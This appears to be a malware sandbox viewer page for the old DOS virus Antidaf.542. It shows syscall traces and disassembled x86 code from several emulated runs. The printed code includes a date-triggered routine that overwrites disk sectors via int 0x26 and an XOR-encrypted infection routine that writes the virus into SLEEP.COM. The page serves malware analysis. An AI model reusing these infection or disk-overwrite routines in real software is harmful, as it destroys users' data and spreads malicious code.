Sample viewer

vx.netlux.org/Virus.DOS.CivilWar.Antidaf.542

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:15:32.165451996Z 26 PC: 12a6a | Set disk transfer address
2018-12-17T22:15:32.166920473Z 42 PC: 12a7b | Get date 0x12a7b: cmp dh, 0xb
0x12a7e: jne 0x12a9e
0x12a80: cmp al, 1
0x12a82: jne 0x12a9e
0x12a84: mov ah, 9
0x12a86: lea dx, word ptr [bp + 0x26a]
0x12a8a: int 0x21
0x12a8c: mov ah, 0x19
0x12a8e: int 0x21
0x12a90: mov dx, 0
0x12a93: mov cx, 0x10
0x12a96: mov bx, 0
0x12a99: int 0x26
0x12a9b: jmp 0x12b84
0x12a9e: lea dx, word ptr [bp + 0x254]
0x12aa2: mov ah, 0x4e
0x12aa4: xor cx, cx
0x12aa6: int 0x21
0x12aa8: mov ax, 0x3d02
0x12aab: mov dx, 0xfe1e
2018-12-17T22:15:32.168546692Z 78 PC: 12aa8 | Find first file
2018-12-17T22:15:32.172455125Z 61 PC: 12ab0 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:15:32.17769957Z 87 PC: 12aba | Get or set file date and time
2018-12-17T22:15:32.178915534Z 63 PC: 12ad1 | Read file or device (Read 6 bytes on handle 5)
2018-12-17T22:15:32.182899568Z 44 PC: 12b07 | Get time 0x12b07: mov byte ptr [bp + 0x322], dh
0x12b0b: mov al, dh
0x12b0d: xor al, byte ptr [bp + 0x321]
0x12b11: mov byte ptr [bp + 0x323], al
0x12b15: lea si, word ptr [bp + 0x123]
0x12b19: mov di, 0xfd00
0x12b1c: mov cx, 0x201
0x12b1f: lodsb al, byte ptr [si]
0x12b20: xor al, byte ptr [bp + 0x323]
0x12b24: stosb byte ptr es:[di], al
0x12b25: loop 0x12b1f
0x12b27: mov al, byte ptr [bp + 0x323]
0x12b2b: inc al
0x12b2d: mov byte ptr [bp + 0x323], al
0x12b31: mov ax, 0x4200
0x12b34: call 0x12b89
0x12b37: mov ah, 0x40
0x12b39: mov cx, 1
0x12b3c: lea dx, word ptr [bp + 0x268]
0x12b40: int 0x21
2018-12-17T22:15:32.185201075Z 66 PC: 12b93 | Move file pointer
2018-12-17T22:15:32.186481711Z 64 PC: 12b42 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T22:15:32.189082277Z 64 PC: 12b4d | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:15:32.197385373Z 64 PC: 12b58 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:15:32.207182727Z 66 PC: 12b93 | Move file pointer
2018-12-17T22:15:32.208715286Z 64 PC: 12b69 | Write file or device (Write 29 bytes on handle 5)
2018-12-17T22:15:32.212149804Z 64 PC: 12b73 | Write file or device (Write 513 bytes on handle 5)
2018-12-17T22:15:32.229512716Z 87 PC: 12b84 | Get or set file date and time

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2839,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:47:20.139844629Z 26 PC: 12a6a | Set disk transfer address
2018-12-25T11:47:20.141624494Z 42 PC: 12a7b | Get date 0x12a7b: cmp dh, 0xb
0x12a7e: jne 0x12a9e
0x12a80: cmp al, 1
0x12a82: jne 0x12a9e
0x12a84: mov ah, 9
0x12a86: lea dx, word ptr [bp + 0x26a]
0x12a8a: int 0x21
0x12a8c: mov ah, 0x19
0x12a8e: int 0x21
0x12a90: mov dx, 0
0x12a93: mov cx, 0x10
0x12a96: mov bx, 0
0x12a99: int 0x26
0x12a9b: jmp 0x12b84
0x12a9e: lea dx, word ptr [bp + 0x254]
0x12aa2: mov ah, 0x4e
0x12aa4: xor cx, cx
0x12aa6: int 0x21
0x12aa8: mov ax, 0x3d02
0x12aab: mov dx, 0xfe1e
2018-12-25T11:47:20.144288797Z 78 PC: 12aa8 | Find first file
2018-12-25T11:47:20.151109423Z 61 PC: 12ab0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:47:20.158790692Z 87 PC: 12aba | Get or set file date and time
2018-12-25T11:47:20.161034397Z 63 PC: 12ad1 | Read file or device (Read 6 bytes on handle 5)
2018-12-25T11:47:20.167996692Z 44 PC: 12b07 | Get time 0x12b07: mov byte ptr [bp + 0x322], dh
0x12b0b: mov al, dh
0x12b0d: xor al, byte ptr [bp + 0x321]
0x12b11: mov byte ptr [bp + 0x323], al
0x12b15: lea si, word ptr [bp + 0x123]
0x12b19: mov di, 0xfd00
0x12b1c: mov cx, 0x201
0x12b1f: lodsb al, byte ptr [si]
0x12b20: xor al, byte ptr [bp + 0x323]
0x12b24: stosb byte ptr es:[di], al
0x12b25: loop 0x12b1f
0x12b27: mov al, byte ptr [bp + 0x323]
0x12b2b: inc al
0x12b2d: mov byte ptr [bp + 0x323], al
0x12b31: mov ax, 0x4200
0x12b34: call 0x12b89
0x12b37: mov ah, 0x40
0x12b39: mov cx, 1
0x12b3c: lea dx, word ptr [bp + 0x268]
0x12b40: int 0x21
2018-12-25T11:47:20.170374147Z 66 PC: 12b93 | Move file pointer
2018-12-25T11:47:20.184748746Z 64 PC: 12b42 | Write file or device (Write 1 bytes on handle 5)
2018-12-25T11:47:20.187760632Z 64 PC: 12b4d | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:47:20.191029505Z 64 PC: 12b58 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:47:20.195667581Z 66 PC: 12b93 | Move file pointer (See above)
2018-12-25T11:47:20.198177867Z 64 PC: 12b69 | Write file or device (Write 29 bytes on handle 5)
2018-12-25T11:47:20.201628976Z 64 PC: 12b73 | Write file or device (Write 513 bytes on handle 5)
2018-12-25T11:47:20.218367013Z 87 PC: 12b84 | Get or set file date and time

{"DateBased":true,"Day":1,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2839,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:47:20.341303887Z 26 PC: 12a6a | Set disk transfer address
2018-12-25T11:47:20.343486879Z 42 PC: 12a7b | Get date 0x12a7b: cmp dh, 0xb
0x12a7e: jne 0x12a9e
0x12a80: cmp al, 1
0x12a82: jne 0x12a9e
0x12a84: mov ah, 9
0x12a86: lea dx, word ptr [bp + 0x26a]
0x12a8a: int 0x21
0x12a8c: mov ah, 0x19
0x12a8e: int 0x21
0x12a90: mov dx, 0
0x12a93: mov cx, 0x10
0x12a96: mov bx, 0
0x12a99: int 0x26
0x12a9b: jmp 0x12b84
0x12a9e: lea dx, word ptr [bp + 0x254]
0x12aa2: mov ah, 0x4e
0x12aa4: xor cx, cx
0x12aa6: int 0x21
0x12aa8: mov ax, 0x3d02
0x12aab: mov dx, 0xfe1e
2018-12-25T11:47:20.345740812Z 78 PC: 12aa8 | Find first file
2018-12-25T11:47:20.351529955Z 61 PC: 12ab0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:47:20.358376447Z 87 PC: 12aba | Get or set file date and time
2018-12-25T11:47:20.360155791Z 63 PC: 12ad1 | Read file or device (Read 6 bytes on handle 5)
2018-12-25T11:47:20.36660002Z 44 PC: 12b07 | Get time 0x12b07: mov byte ptr [bp + 0x322], dh
0x12b0b: mov al, dh
0x12b0d: xor al, byte ptr [bp + 0x321]
0x12b11: mov byte ptr [bp + 0x323], al
0x12b15: lea si, word ptr [bp + 0x123]
0x12b19: mov di, 0xfd00
0x12b1c: mov cx, 0x201
0x12b1f: lodsb al, byte ptr [si]
0x12b20: xor al, byte ptr [bp + 0x323]
0x12b24: stosb byte ptr es:[di], al
0x12b25: loop 0x12b1f
0x12b27: mov al, byte ptr [bp + 0x323]
0x12b2b: inc al
0x12b2d: mov byte ptr [bp + 0x323], al
0x12b31: mov ax, 0x4200
0x12b34: call 0x12b89
0x12b37: mov ah, 0x40
0x12b39: mov cx, 1
0x12b3c: lea dx, word ptr [bp + 0x268]
0x12b40: int 0x21
2018-12-25T11:47:20.369116669Z 66 PC: 12b93 | Move file pointer
2018-12-25T11:47:20.371595196Z 64 PC: 12b42 | Write file or device (Write 1 bytes on handle 5)
2018-12-25T11:47:20.374329158Z 64 PC: 12b4d | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:47:20.37688867Z 64 PC: 12b58 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:47:20.379973395Z 66 PC: 12b93 | Move file pointer (See above)
2018-12-25T11:47:20.381355736Z 64 PC: 12b69 | Write file or device (Write 29 bytes on handle 5)
2018-12-25T11:47:20.383979333Z 64 PC: 12b73 | Write file or device (Write 513 bytes on handle 5)
2018-12-25T11:47:20.399503971Z 87 PC: 12b84 | Get or set file date and time

{"DateBased":true,"Day":3,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2839,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:47:20.719884105Z 26 PC: 12a6a | Set disk transfer address
2018-12-25T11:47:20.721535267Z 42 PC: 12a7b | Get date 0x12a7b: cmp dh, 0xb
0x12a7e: jne 0x12a9e
0x12a80: cmp al, 1
0x12a82: jne 0x12a9e
0x12a84: mov ah, 9
0x12a86: lea dx, word ptr [bp + 0x26a]
0x12a8a: int 0x21
0x12a8c: mov ah, 0x19
0x12a8e: int 0x21
0x12a90: mov dx, 0
0x12a93: mov cx, 0x10
0x12a96: mov bx, 0
0x12a99: int 0x26
0x12a9b: jmp 0x12b84
0x12a9e: lea dx, word ptr [bp + 0x254]
0x12aa2: mov ah, 0x4e
0x12aa4: xor cx, cx
0x12aa6: int 0x21
0x12aa8: mov ax, 0x3d02
0x12aab: mov dx, 0xfe1e
2018-12-25T11:47:20.724259013Z 9 PC: 12a8c | Display string (String= ' The Anti-DAF virus DAF-TRUCKS Eindhoven Hugo vd Goeslaan 1 Postbus 90063 5600 PR Eindhoven, The Netherlands DAF sucks... (c) 1992 Dark Helmet & The Virus Research Centre ')
2018-12-25T11:47:20.744593514Z 25 PC: 12a90 | Get default drive